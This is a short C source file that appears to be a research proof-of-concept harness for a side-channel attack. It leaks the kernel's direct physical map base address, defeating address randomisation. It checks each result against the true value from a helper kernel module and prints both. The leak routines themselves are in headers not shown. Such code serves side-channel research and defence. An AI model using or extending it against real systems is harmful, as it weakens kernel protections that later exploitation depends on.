39 lines
No EOL
1,014 B
C
39 lines
No EOL
1,014 B
C
#include "coarse_grain_leak.h"
|
|
#define VALIDATE
|
|
#ifdef VALIDATE
|
|
#include "ulkm.h"
|
|
#endif
|
|
|
|
#define TRIES 100
|
|
|
|
int main(void)
|
|
{
|
|
setvbuf(stdout, NULL, _IONBF, 0);
|
|
setvbuf(stdin, NULL, _IONBF, 0);
|
|
setvbuf(stderr, NULL, _IONBF, 0);
|
|
|
|
/* warmup */
|
|
#ifdef VALIDATE
|
|
size_t dpm_base;
|
|
lkm_init();
|
|
lkm_dpm_leak((size_t)&dpm_base);
|
|
init_tlb_flush();
|
|
// size_t stack;
|
|
// lkm_stack_leak((size_t)&stack); //this technically doesn't need to be the stack page, but it happens to give us a mapped and an unmapped 4k page
|
|
// DualThreshold t = detect_threshold(stack + 0x3000, stack + 0x4000, 100);
|
|
// THRESHOLD = t.lower;
|
|
#endif
|
|
|
|
for (volatile size_t i = 0; i < (1ULL << 30); ++i);
|
|
/* leaking */
|
|
size_t found = 0;
|
|
size_t addr = dpm_leak_found(TRIES, &found);
|
|
printf("%016zx\n", addr);
|
|
#ifdef VALIDATE
|
|
if (dpm_base != addr) {
|
|
printf("[!] dpm wrong found %016zx to dpm %016zx\n", addr, dpm_base);
|
|
return 0;
|
|
}
|
|
#endif
|
|
return found ? 1 : -1;
|
|
} |